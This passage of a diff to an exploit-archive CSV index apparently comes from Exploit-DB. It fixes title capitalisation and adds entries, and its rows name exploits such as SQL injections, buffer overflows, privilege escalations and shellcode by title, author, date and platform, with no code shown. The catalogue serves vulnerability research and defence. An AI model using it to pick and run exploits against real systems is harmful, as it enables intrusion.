(1)",2011-03-02,prdelka,linux,dos,0 16265,platforms/php/webapps/16265.txt,"Readmore Systems Script - SQL Injection",2011-03-02,"vBzone and Zooka and El3arby",php,webapps,0 16266,platforms/php/webapps/16266.txt,"Quicktech - SQL Injection",2011-03-02,eXeSoul,php,webapps,0 -16267,platforms/php/webapps/16267.txt,"bitweaver 2.8.0 - Multiple Vulnerabilities",2011-03-02,lemlajt,php,webapps,0 +16267,platforms/php/webapps/16267.txt,"Bitweaver 2.8.0 - Multiple Vulnerabilities",2011-03-02,lemlajt,php,webapps,0 16268,platforms/php/webapps/16268.pl,"cChatBox for vBulletin 3.6.8 / 3.7.x - SQL Injection",2011-03-02,DSecurity,php,webapps,0 16270,platforms/linux/dos/16270.c,"vsftpd 2.3.2 - Denial of Service",2011-03-02,"Maksymilian Arciemowicz",linux,dos,0 16271,platforms/ios/remote/16271.txt,"iOS TIOD 1.3.3 - Directory Traversal",2011-03-03,"R3d@l3rt_ H@ckk3y",ios,remote,0 @@ -14097,7 +14097,7 @@ id,file,description,date,author,platform,type,port 16284,platforms/unix/dos/16284.rb,"Subversion - Date Svnserve (Metasploit)",2010-08-07,Metasploit,unix,dos,0 16285,platforms/linux/remote/16285.rb,"NTP daemon readvar - Buffer Overflow (Metasploit)",2010-08-25,Metasploit,linux,remote,0 16286,platforms/multiple/remote/16286.rb,"RealServer - Describe Buffer Overflow (Metasploit)",2010-08-07,Metasploit,multiple,remote,0 -16287,platforms/multiple/remote/16287.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit)",2010-11-11,Metasploit,multiple,remote,0 +16287,platforms/multiple/remote/16287.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit) (2)",2010-11-11,Metasploit,multiple,remote,0 16289,platforms/linux/remote/16289.rb,"Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (Metasploit)",2010-02-11,Metasploit,linux,remote,0 16290,platforms/multiple/remote/16290.rb,"Veritas NetBackup - Remote Command Execution (Metasploit) (2)",2010-10-09,Metasploit,multiple,remote,0 16291,platforms/multiple/remote/16291.rb,"HP OpenView OmniBack II - Command Execution (Metasploit)",2010-09-20,Metasploit,multiple,remote,0 @@ -14195,7 +14195,7 @@ id,file,description,date,author,platform,type,port 16383,platforms/windows/remote/16383.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_INITIALIZE_RF Buffer Overflow (Metasploit)",2010-11-30,Metasploit,windows,remote,0 16384,platforms/windows/remote/16384.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_TXTEVENT Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,0 16385,platforms/windows/remote/16385.rb,"DATAC RealWin SCADA Server - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 -16386,platforms/windows/remote/16386.rb,"D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 +16386,platforms/windows/remote/16386.rb,"D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit) (2)",2010-07-03,Metasploit,windows,remote,0 16387,platforms/hardware/remote/16387.rb,"Broadcom Wireless Driver - Probe Response SSID Overflow (2) (Metasploit)",2010-07-03,Metasploit,hardware,remote,0 16388,platforms/hardware/remote/16388.rb,"NetGear WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit)",2010-07-03,Metasploit,hardware,remote,0 16389,platforms/windows/remote/16389.rb,"Omni-NFS Server - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 @@ -14310,7 +14310,7 @@ id,file,description,date,author,platform,type,port 16498,platforms/windows/remote/16498.rb,"EnjoySAP SAP GUI - ActiveX Control Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16499,platforms/windows/remote/16499.rb,"Microsoft Internet Explorer - Unsafe Scripting Misconfiguration (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16500,platforms/windows/remote/16500.rb,"Hyleos ChemView - ActiveX Control Stack Buffer Overflow (Metasploit)",2010-07-27,Metasploit,windows,remote,0 -16501,platforms/windows/remote/16501.rb,"Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit)",2010-09-21,Metasploit,windows,remote,0 +16501,platforms/windows/remote/16501.rb,"Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit) (2)",2010-09-21,Metasploit,windows,remote,0 16502,platforms/windows/remote/16502.rb,"IBM Lotus Domino Web Access Upload Module - Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16503,platforms/windows/local/16503.rb,"Adobe - Doc.media.newPlayer Use-After-Free (1)",2010-04-30,Metasploit,windows,local,0 16504,platforms/windows/local/16504.rb,"Adobe - 'util.printf()' Buffer Overflow (1)",2010-05-03,Metasploit,windows,local,0 @@ -14373,7 +14373,7 @@ id,file,description,date,author,platform,type,port 16561,platforms/windows/remote/16561.rb,"Microsoft Internet Explorer - COM CreateObject Code Execution (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16562,platforms/windows/local/16562.rb,"Apple iTunes 4.7 - Playlist Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,local,0 16563,platforms/windows/remote/16563.rb,"Tumbleweed FileTransfer - vcst_eu.dll ActiveX Control Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 -16564,platforms/windows/remote/16564.rb,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 +16564,platforms/windows/remote/16564.rb,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit) (2)",2010-07-03,Metasploit,windows,remote,0 16565,platforms/windows/remote/16565.rb,"RKD Software BarCodeAx.dll 4.9 - ActiveX Remote Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16566,platforms/windows/remote/16566.rb,"CommuniCrypt Mail 1.16 - SMTP ActiveX Stack Buffer Overflow (Metasploit)",2010-07-26,Metasploit,windows,remote,0 16567,platforms/windows/remote/16567.rb,"Microsoft Internet Explorer - Tabular Data Control ActiveX Memory Corruption (Metasploit)",2010-04-30,Metasploit,windows,remote,0 @@ -14725,7 +14725,7 @@ id,file,description,date,author,platform,type,port 16916,platforms/linux/remote/16916.rb,"Citrix Access Gateway - Command Execution (Metasploit)",2011-03-03,Metasploit,linux,remote,0 16917,platforms/php/webapps/16917.rb,"Dogfood CRM - spell.php Remote Command Execution (Metasploit)",2010-07-03,Metasploit,php,webapps,0 16918,platforms/freebsd/remote/16918.rb,"Zabbix Agent - net.tcp.listen Command Injection (Metasploit)",2010-07-03,Metasploit,freebsd,remote,0 -16919,platforms/linux/remote/16919.rb,"DistCC Daemon - Command Execution (Metasploit)",2010-07-03,Metasploit,linux,remote,0 +16919,platforms/linux/remote/16919.rb,"DistCC Daemon - Command Execution (Metasploit) (2)",2010-07-03,Metasploit,linux,remote,0 16920,platforms/linux/remote/16920.rb,"SpamAssassin spamd - Remote Command Execution (Metasploit)",2010-04-30,Metasploit,linux,remote,0 16921,platforms/linux/remote/16921.rb,"ProFTPd-1.3.3c - Backdoor Command Execution (Metasploit)",2010-12-03,Metasploit,linux,remote,0 16922,platforms/linux/remote/16922.rb,"UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)",2010-12-05,Metasploit,linux,remote,0 @@ -14868,7 +14868,7 @@ id,file,description,date,author,platform,type,port 17077,platforms/php/webapps/17077.txt,"Pligg CMS 1.1.3 - Multiple Vulnerabilities",2011-03-30,"Jelmer de Hen",php,webapps,0 17078,platforms/multiple/remote/17078.java,"Zend Java Bridge - Remote Code Execution (ZDI-11-113)",2011-03-30,ikki,multiple,remote,0 17079,platforms/php/webapps/17079.txt,"IrIran Shoping Script - SQL Injection",2011-03-30,Net.Edit0r,php,webapps,0 -17080,platforms/php/webapps/17080.txt,"Bigace 2.7.5 - Arbitrary File Upload",2011-03-30,Net.Edit0r,php,webapps,0 +17080,platforms/php/webapps/17080.txt,"BigACE 2.7.5 - Arbitrary File Upload",2011-03-30,Net.Edit0r,php,webapps,0 17081,platforms/asp/webapps/17081.txt,"CosmoQuest - Login Bypass",2011-03-30,Net.Edit0r,asp,webapps,0 17083,platforms/linux/local/17083.pl,"HT Editor 2.0.18 - File Opening Stack Overflow",2011-03-30,ZadYree,linux,local,0 17145,platforms/windows/dos/17145.pl,"Vallen Zipper 2.30 - '.zip' Heap Overflow",2011-04-11,"C4SS!0 G0M3S",windows,dos,0 @@ -15321,7 +15321,7 @@ id,file,description,date,author,platform,type,port 17628,platforms/php/webapps/17628.txt,"WordPress Plugin Media Library Categories 1.0.6 - SQL Injection",2011-08-06,"Miroslav Stampar",php,webapps,0 17629,platforms/php/webapps/17629.txt,"acontent 1.1 - Multiple Vulnerabilities",2011-08-06,LiquidWorm,php,webapps,0 17630,platforms/php/webapps/17630.txt,"AChecker 1.2 - Multiple Error-Based SQL Injection Vulnerabilities",2011-08-06,LiquidWorm,php,webapps,0 -17631,platforms/php/webapps/17631.txt,"atutor 2.0.2 - Multiple Vulnerabilities",2011-08-06,LiquidWorm,php,webapps,0 +17631,platforms/php/webapps/17631.txt,"ATutor 2.0.2 - Multiple Vulnerabilities",2011-08-06,LiquidWorm,php,webapps,0 17633,platforms/php/webapps/17633.txt,"Cart Software - Multiple Vulnerabilities",2011-08-06,hosinn,php,webapps,0 17634,platforms/windows/local/17634.pl,"Free CD to MP3 Converter 3.1 - Universal DEP Bypass",2011-08-07,"C4SS!0 G0M3S",windows,local,0 17635,platforms/hardware/remote/17635.rb,"HP JetDirect PJL - Interface Universal Directory Traversal (Metasploit)",2011-08-07,"Myo Soe",hardware,remote,0 @@ -16175,7 +16175,7 @@ id,file,description,date,author,platform,type,port 18659,platforms/php/webapps/18659.rb,"FreePBX 2.10.0 / 2.9.0 - callmenum Remote Code Execution (Metasploit)",2012-03-24,Metasploit,php,webapps,0 18660,platforms/php/webapps/18660.txt,"RIPS 0.53 - Multiple Local File Inclusion",2012-03-24,localh0t,php,webapps,0 18661,platforms/windows/dos/18661.txt,"RealPlayer .mp4 - file handling memory Corruption",2012-03-24,"Senator of Pirates",windows,dos,0 -18676,platforms/php/webapps/18676.txt,"boastMachine 3.1 - Cross-Site Request Forgery (Add Admin)",2012-03-28,Dr.NaNo,php,webapps,0 +18676,platforms/php/webapps/18676.txt,"BoastMachine 3.1 - Cross-Site Request Forgery (Add Admin)",2012-03-28,Dr.NaNo,php,webapps,0 18670,platforms/php/webapps/18670.txt,"PicoPublisher 2.0 - SQL Injection",2012-03-28,ZeTH,php,webapps,0 18666,platforms/windows/remote/18666.rb,"UltraVNC 1.0.2 Client - (vncviewer.exe) Buffer Overflow (Metasploit)",2012-03-26,Metasploit,windows,remote,0 18665,platforms/multiple/dos/18665.py,"PHP 5.4.0 Built-in Web Server - Denial of Service (PoC)",2012-03-25,ls,multiple,dos,0 @@ -17027,6 +17027,7 @@ id,file,description,date,author,platform,type,port 19651,platforms/freebsd/local/19651.txt,"FreeBSD 3.3 - Seyon setgid dialer",1999-12-01,"Brock Tellier",freebsd,local,0 19652,platforms/freebsd/local/19652.c,"FreeBSD 3.3 xmindpath - Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0 19653,platforms/freebsd/local/19653.c,"FreeBSD 3.3 angband - Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0 +40430,platforms/windows/local/40430.cs,"Microsoft Windows - RegLoadAppKey Hive Enumeration Privilege Escalation (MS16-111)",2016-09-26,"Google Security Research",windows,local,0 19654,platforms/sco/local/19654.pl,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'uidadmin'",1998-12-02,"Brock Tellier",sco,local,0 19655,platforms/linux/local/19655.txt,"RSA Security RSAREF 2.0 - Buffer Overflow",1999-12-14,"Alberto Solino",linux,local,0 19656,platforms/sco/local/19656.c,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'xauto' Buffer Overflow",1999-12-03,"Brock Tellier",sco,local,0 @@ -17363,7 +17364,7 @@ id,file,description,date,author,platform,type,port 20006,platforms/windows/dos/20006.nasl,"Microsoft Windows NT 4.0 - Remote Registry Request Denial of Service (2)",2000-06-08,"Renaud Deraison",windows,dos,0 20007,platforms/cgi/remote/20007.c,"3R Soft MailStudio 2000 2.0 - userreg.cgi Arbitrary Command Execution",2000-04-24,fygrave,cgi,remote,0 20008,platforms/cgi/remote/20008.txt,"3R Soft MailStudio 2000 2.0 - Arbitrary File Access",2000-06-09,s0ftpr0ject,cgi,remote,0 -20009,platforms/linux/remote/20009.py,"atmail email server Appliance 6.4 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Remote Code Execution",2012-07-21,muts,linux,remote,0 +20009,platforms/linux/remote/20009.py,"AtMail Email Server Appliance 6.4 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Remote Code Execution",2012-07-21,muts,linux,remote,0 20011,platforms/windows/webapps/20011.js,"SolarWinds orion network performance monitor 10.2.2 - Multiple Vulnerabilities",2012-07-21,muts,windows,webapps,0 20012,platforms/windows/local/20012.txt,"Computer Associates eTrust Intrusion Detection 1.4.1.13 - Weak Encryption",2000-06-07,Phate.net,windows,local,0 20013,platforms/linux/local/20013.c,"Sam Lantinga splitvt 1.6.3 - Buffer Overflow",2000-06-01,Syzop,linux,local,0 @@ -17641,6 +17642,7 @@ id,file,description,date,author,platform,type,port 20303,platforms/cgi/remote/20303.pl,"Oatmeal Studios Mail File 1.10 - Arbitrary File Disclosure",2000-10-11,"Dirk Brockhausen",cgi,remote,0 20304,platforms/windows/dos/20304.txt,"Omnicron OmniHTTPd 1.1/2.0 Alpha 1 - visiadmin.exe Denial of Service",1999-06-05,"Valentin Perelogin",windows,dos,0 20305,platforms/windows/remote/20305.txt,"Microsoft Site Server 2.0 with IIS 4.0 - Arbitrary File Upload",1999-01-30,Mnemonix,windows,remote,0 +40428,platforms/windows/local/40428.txt,"Macro Expert 4.0 - Multiple Privilege Escalations",2016-09-26,Tulpa,windows,local,0 20306,platforms/windows/remote/20306.html,"Microsoft Virtual Machine - Arbitrary Java Codebase Execution",2000-10-18,"Georgi Guninski",windows,remote,0 20307,platforms/windows/dos/20307.txt,"Hilgraeve HyperTerminal 6.0 - Telnet Buffer Overflow",2000-10-18,"Ussr Labs",windows,dos,0 20308,platforms/linux/remote/20308.c,"Samba 1.9.19 - Long Password Buffer Overflow",1997-09-25,root@adm.kix-azz.org,linux,remote,0 @@ -17683,7 +17685,7 @@ id,file,description,date,author,platform,type,port 20345,platforms/php/webapps/20345.txt,"iauto mobile Application 2012 - Multiple Vulnerabilities",2012-08-08,Vulnerability-Lab,php,webapps,0 20346,platforms/php/webapps/20346.txt,"Inout Mobile Webmail APP - Persistent Cross-Site Scripting",2012-08-08,Vulnerability-Lab,php,webapps,0 20347,platforms/php/webapps/20347.txt,"Openconstructor CMS 3.12.0 - 'id' Parameter Multiple SQL Injection",2012-08-08,"Lorenzo Cantoni",php,webapps,0 -20348,platforms/windows/webapps/20348.py,"axigen mail server 8.0.1 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 +20348,platforms/windows/webapps/20348.py,"Axigen Mail Server 8.0.1 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 20349,platforms/windows/webapps/20349.py,"emailarchitect enterprise email server 10.0 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 20350,platforms/windows/webapps/20350.py,"escon supportportal pro 3.0 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 20351,platforms/windows/webapps/20351.py,"mailenable enterprise 6.5 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 @@ -17732,6 +17734,7 @@ id,file,description,date,author,platform,type,port 20395,platforms/unix/remote/20395.c,"BNC 2.2.4/2.4.6/2.4.8 - IRC Proxy Buffer Overflow (2)",1998-12-26,"jamez and dumped",unix,remote,0 20396,platforms/hp-ux/local/20396.sh,"HP-UX 10.x/11.x - Aserver PATH",1998-10-18,Loneguard,hp-ux,local,0 20397,platforms/cgi/remote/20397.txt,"McMurtrey/Whitaker & Associates Cart32 3.0/3.1/3.5 - Full Path Disclosure",2000-11-10,sozni,cgi,remote,0 +40427,platforms/windows/local/40427.txt,"Iperius Remote 1.7.0 - Unquoted Service Path Privilege Escalation",2016-09-26,Tulpa,windows,local,0 20398,platforms/php/webapps/20398.txt,"MobileCartly 1.0 - Arbitrary File Deletion",2012-08-10,GoLd_M,php,webapps,0 20399,platforms/windows/remote/20399.html,"Microsoft Indexing Services (Windows 2000) - File Verification",2000-11-10,"Georgi Guninski",windows,remote,0 20400,platforms/cgi/dos/20400.txt,"McMurtrey/Whitaker & Associates Cart32 3.0/3.1/3.5 - Denial of Service",2000-11-10,sozni,cgi,dos,0 @@ -18005,6 +18008,7 @@ id,file,description,date,author,platform,type,port 20677,platforms/windows/webapps/20677.txt,"IOServer 1.0.18.0 - Directory Traversal",2012-08-20,hinge,windows,webapps,0 20678,platforms/unix/local/20678.c,"Rob Malda ASCDC 0.3 - Buffer Overflow (1)",2001-03-08,anonymous,unix,local,0 20679,platforms/unix/local/20679.c,"Rob Malda ASCDC 0.3 - Buffer Overflow (2)",2001-03-08,"the itch",unix,local,0 +40426,platforms/windows/local/40426.txt,"MSI - NTIOLib.sys / WinIO.sys Local Privilege Escalation",2016-09-26,ReWolf,windows,local,0 20680,platforms/windows/remote/20680.html,"Microsoft Internet Explorer 5.0.1/5.5/6.0 - Telnet Client File Overwrite",2001-03-09,"Oliver Friedrichs",windows,remote,0 20681,platforms/windows/dos/20681.c,"Baltimore Technologies WEBsweeper 4.0 - Denial of Service",2001-01-22,honoriak,windows,dos,0 20682,platforms/windows/dos/20682.txt,"Michael Lamont Savant Web Server 3.0 - Denial of Service",2001-03-09,Phiber,windows,dos,0 @@ -18036,6 +18040,7 @@ id,file,description,date,author,platform,type,port 20720,platforms/linux/local/20720.c,"Linux Kernel 2.2.18 (RedHat 7.0/6.2 & 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Privilege Escalation (1)",2001-03-27,"Wojciech Purczynski",linux,local,0 20721,platforms/linux/local/20721.c,"Linux Kernel 2.2.18 (RedHat 7.0/6.2 & 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Privilege Escalation (2)",2001-03-27,"Wojciech Purczynski",linux,local,0 20722,platforms/multiple/remote/20722.txt,"Caucho Technology Resin 1.2/1.3 - JavaBean Disclosure",2001-04-03,lovehacker,multiple,remote,0 +40425,platforms/windows/local/40425.txt,"Elantech-Smart Pad 11.9.0.0 - Unquoted Service Path Privilege Escalation",2016-09-26,zaeek,windows,local,0 20723,platforms/windows/remote/20723.pl,"Gene6 BPFTP FTP Server 2.0 - User Credentials Disclosure",2001-04-03,"Rob Beck",windows,remote,0 20724,platforms/hp-ux/local/20724.txt,"Shareplex 2.1.3.9/2.2.2 Beta - Arbitrary Local File Disclosure",2001-03-30,"Dixie Flatline",hp-ux,local,0 20725,platforms/cgi/remote/20725.txt,"Microburst uStorekeeper 1.x - Arbitrary Commands",2001-04-02,"UkR hacking team",cgi,remote,0 @@ -18075,6 +18080,7 @@ id,file,description,date,author,platform,type,port 20759,platforms/php/webapps/20759.txt,"letodms 3.3.6 - Multiple Vulnerabilities",2012-08-23,"Shai rod",php,webapps,0 20760,platforms/php/webapps/20760.txt,"op5 Monitoring 5.4.2 - (VM Applicance) Multiple Vulnerabilities",2012-08-23,loneferret,php,webapps,0 20764,platforms/solaris/remote/20764.txt,"Solaris 2.6 - FTP Core Dump Shadow Password Recovery",2001-04-17,warning3,solaris,remote,0 +40423,platforms/php/webapps/40423.txt,"Joomla! Component Event Booking 2.10.1 - SQL Injection",2016-09-26,"Persian Hack Team",php,webapps,80 20765,platforms/linux/remote/20765.pl,"Linux Kernel 2.4 - IPTables FTP Stateful Inspection Arbitrary Filter Rule Insertion",2001-04-16,"Cristiano Lincoln Mattos",linux,remote,0 20766,platforms/unix/local/20766.c,"SGI IRIX 6.5 / Solaris 7.0/8 - CDE dtsession Buffer Overflow",2001-04-11,"Last Stage of Delirium",unix,local,0 20767,platforms/solaris/local/20767.c,"Solaris 2.5/2.6/7.0/8 - kcms_configure KCMS_PROFILES Buffer Overflow (1)",1999-12-01,"Last Stage of Delirium",solaris,local,0 @@ -18122,6 +18128,7 @@ id,file,description,date,author,platform,type,port 20810,platforms/multiple/dos/20810.c,"FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (1)",1997-11-20,m3lt,multiple,dos,0 20811,platforms/multiple/dos/20811.cpp,"FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (2)",1997-11-20,"Konrad Malewski",multiple,dos,0 20812,platforms/windows/dos/20812.c,"FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (3)",1997-11-20,m3lt,windows,dos,0 +40422,platforms/windows/local/40422.txt,"NetDrive 2.6.12 - Unquoted Service Path Privilege Escalation",2016-09-26,Tulpa,windows,local,0 20813,platforms/multiple/dos/20813.c,"FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (4)",1997-11-20,MondoMan,multiple,dos,0 20814,platforms/windows/dos/20814.c,"FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (5)",1997-11-20,"Dejan Levaja",windows,dos,0 20815,platforms/windows/remote/20815.pl,"Microsoft IIS 5.0 - '.printer' ISAPI Extension Buffer Overflow (1)",2001-05-01,storm,windows,remote,0 @@ -18718,7 +18725,7 @@ id,file,description,date,author,platform,type,port 21427,platforms/php/webapps/21427.txt,"MiniBB 1.2 - Cross-Site Scripting",2002-04-17,frog,php,webapps,0 21428,platforms/php/dos/21428.txt,"Messagerie 1.0 - Arbitrary User Removal Denial of Service",2002-04-27,frog,php,dos,0 21429,platforms/windows/dos/21429.c,"3CDaemon 2.0 - Buffer Overflow (1)",2002-04-15,"MaD SKiLL",windows,dos,0 -22216,platforms/php/webapps/22216.txt,"bitweaver 2.8.1 - Multiple Vulnerabilities",2012-10-24,"Trustwave's SpiderLabs",php,webapps,0 +22216,platforms/php/webapps/22216.txt,"Bitweaver 2.8.1 - Multiple Vulnerabilities",2012-10-24,"Trustwave's SpiderLabs",php,webapps,0 21431,platforms/irix/dos/21431.txt,"IRIX 6.5.x - Performance Co-Pilot Remote Denial of Service",2002-04-12,"Marcelo Magnasco",irix,dos,0 21432,platforms/windows/dos/21432.txt,"BEA Systems WebLogic Server and Express 7.0 - Null Character Denial of Service",2002-04-30,"Peter Gründl",windows,dos,0 21433,platforms/cgi/webapps/21433.txt,"MyGuestbook 1.0 - Script Injection",2002-04-30,BrainRawt,cgi,webapps,0 @@ -18965,6 +18972,8 @@ id,file,description,date,author,platform,type,port 40363,platforms/win_x86/shellcode/40363.c,"Windows x86 - Password Protected TCP Bind Shell (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 40364,platforms/php/webapps/40364.txt,"wdCalendar 2 - SQL Injection",2016-09-13,"Alfonso Castillo Angel",php,webapps,80 40365,platforms/windows/local/40365.txt,"Zapya Desktop 1.803 - 'ZapyaService.exe' Privilege Escalation",2016-09-13,"Arash Khazaei",windows,local,0 +40366,platforms/php/webapps/40366.txt,"Contrexx CMS egov Module 1.0.0 - SQL Injection",2016-09-13,"hamidreza borghei",php,webapps,80 +40429,platforms/windows/local/40429.cs,"Microsoft Windows 10 10586 (x32/x64) / 8.1 Update 2 - NtLoadKeyEx User Hive Attachment Point Privilege Escalation (MS16-111)",2016-09-26,"Google Security Research",windows,local,0 40367,platforms/cgi/webapps/40367.sh,"Exper EWM-01 ADSL/MODEM - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80 21673,platforms/windows/dos/21673.txt,"IPSwitch IMail 6.x/7.0.x - Web Calendaring Incomplete Post Denial of Service",2002-07-30,anonymous,windows,dos,0 21674,platforms/linux/local/21674.c,"William Deich Super 3.x - SysLog Format String",2002-07-31,gobbles,linux,local,0 @@ -19432,11 +19441,11 @@ id,file,description,date,author,platform,type,port 22152,platforms/php/webapps/22152.txt,"Joomla! Plugin Commedia - 'index.php task Parameter' SQL Injection",2012-10-22,D4NB4R,php,webapps,0 22153,platforms/php/webapps/22153.pl,"Joomla! Component Kunena - 'index.php search Parameter' SQL Injection",2012-10-22,D35m0nd142,php,webapps,0 22154,platforms/windows/dos/22154.pl,"RealPlayer 15.0.6.14.3gp - Crash (PoC)",2012-10-22,coolkaveh,windows,dos,0 -22156,platforms/php/webapps/22156.txt,"White Label CMS 1.5 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2012-10-22,pcsjj,php,webapps,0 +22156,platforms/php/webapps/22156.txt,"Wordpress Plugin White Label CMS 1.5 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2012-10-22,pcsjj,php,webapps,0 22157,platforms/php/webapps/22157.txt,"Schoolhos CMS Beta 2.29 - (index.php id Parameter) SQL Injection",2012-10-22,Cumi,php,webapps,0 22158,platforms/php/webapps/22158.txt,"WordPress Plugin social discussions 6.1.1 - Multiple Vulnerabilities",2012-10-22,waraxe,php,webapps,0 22159,platforms/php/webapps/22159.txt,"subrion CMS 2.2.1 - Multiple Vulnerabilities",2012-10-22,"High-Tech Bridge SA",php,webapps,0 -22160,platforms/php/webapps/22160.txt,"atutor 1.2 - Multiple Vulnerabilities",2012-10-22,"High-Tech Bridge SA",php,webapps,0 +22160,platforms/php/webapps/22160.txt,"ATutor 1.2 - Multiple Vulnerabilities",2012-10-22,"High-Tech Bridge SA",php,webapps,0 22161,platforms/windows/remote/22161.rb,"Turbo FTP Server 1.30.823 - PORT Overflow (Metasploit)",2012-10-23,Metasploit,windows,remote,21 22162,platforms/windows/dos/22162.txt,"Symantec Norton Internet Security 2003 - ICMP Packet Flood Denial of Service",2003-01-13,"Pavel P",windows,dos,0 22163,platforms/php/webapps/22163.txt,"Geeklog 1.3.7 - profiles.php Multiple Cross-Site Scripting Vulnerabilities",2003-01-14,snooq,php,webapps,0 @@ -19593,7 +19602,7 @@ id,file,description,date,author,platform,type,port 22315,platforms/php/webapps/22315.pl,"Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure Weakness (1)",2003-02-28,"Martin Eiszner",php,webapps,0 22316,platforms/php/webapps/22316.pl,"Typo3 3.5 b5 - HTML Hidden Form Field Information Disclosure Weakness (2)",2003-02-28,"Martin Eiszner",php,webapps,0 22317,platforms/php/webapps/22317.txt,"GTCatalog 0.8.16/0.9 - Remote File Inclusion",2003-03-03,frog,php,webapps,0 -40413,platforms/php/webapps/40413.txt,"Joomla Component Huge-IT Video Gallery 1.0.9 - SQL Injection",2016-09-22,"Larry W. Cashdollar",php,webapps,80 +40413,platforms/php/webapps/40413.txt,"Joomla! Component Huge-IT Video Gallery 1.0.9 - SQL Injection",2016-09-22,"Larry W. Cashdollar",php,webapps,80 22318,platforms/php/webapps/22318.txt,"Webchat 0.77 - Defines.php Remote File Inclusion",2003-03-03,frog,php,webapps,0 22319,platforms/hardware/remote/22319.txt,"HP JetDirect Printer - SNMP JetAdmin Device Password Disclosure",2003-03-03,"Sven Pechler",hardware,remote,0 22320,platforms/linux/local/22320.c,"XFree86 4.2 - XLOCALEDIR Local Buffer Overflow (1)",2003-03-03,"dcryptr && tarranta",linux,local,0 @@ -20737,7 +20746,7 @@ id,file,description,date,author,platform,type,port 23491,platforms/windows/remote/23491.pl,"Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Based Buffer Overrun (1)",2003-12-29,fiNis,windows,remote,0 23492,platforms/windows/remote/23492.c,"Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Based Buffer Overrun (2)",2003-12-29,D4rkGr3y,windows,remote,0 23493,platforms/windows/remote/23493.txt,"Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Based Buffer Overrun (3)",2003-12-29,"Luigi Auriemma",windows,remote,0 -23494,platforms/php/webapps/23494.txt,"Clockstone and other CMSMasters Theme - Arbitrary File Upload",2012-12-19,DigiP,php,webapps,0 +23494,platforms/php/webapps/23494.txt,"Wordpress Theme Clockstone (and other CMSMasters Themes) - Arbitrary File Upload",2012-12-19,DigiP,php,webapps,0 23630,platforms/php/webapps/23630.txt,"Aprox Portal 3.0 - File Disclosure",2004-01-31,"Zero X",php,webapps,0 23496,platforms/windows/dos/23496.txt,"DIMIN Viewer 5.4.0 - GIF Decode Crash (PoC)",2012-12-19,"Lizhi Wang",windows,dos,0 23693,platforms/windows/dos/23693.txt,"Sami FTP Server 1.1.3 - Library Crafted GET Request Remote Denial of Service",2004-02-13,"intuit e.b.",windows,dos,0 @@ -22465,7 +22474,7 @@ id,file,description,date,author,platform,type,port 25289,platforms/linux/local/25289.c,"Linux Kernel 2.4.30 / 2.6.11.5 - BlueTooth 'bluez_sock_create' Privilege Escalation",2005-10-19,backdoored.net,linux,local,0 25291,platforms/multiple/remote/25291.txt,"Tincat Network Library - Remote Buffer Overflow",2005-03-28,"Luigi Auriemma",multiple,remote,0 25292,platforms/hardware/webapps/25292.txt,"Cisco Linksys E4200 Firmware - Multiple Vulnerabilities",2013-05-07,sqlhacker,hardware,webapps,0 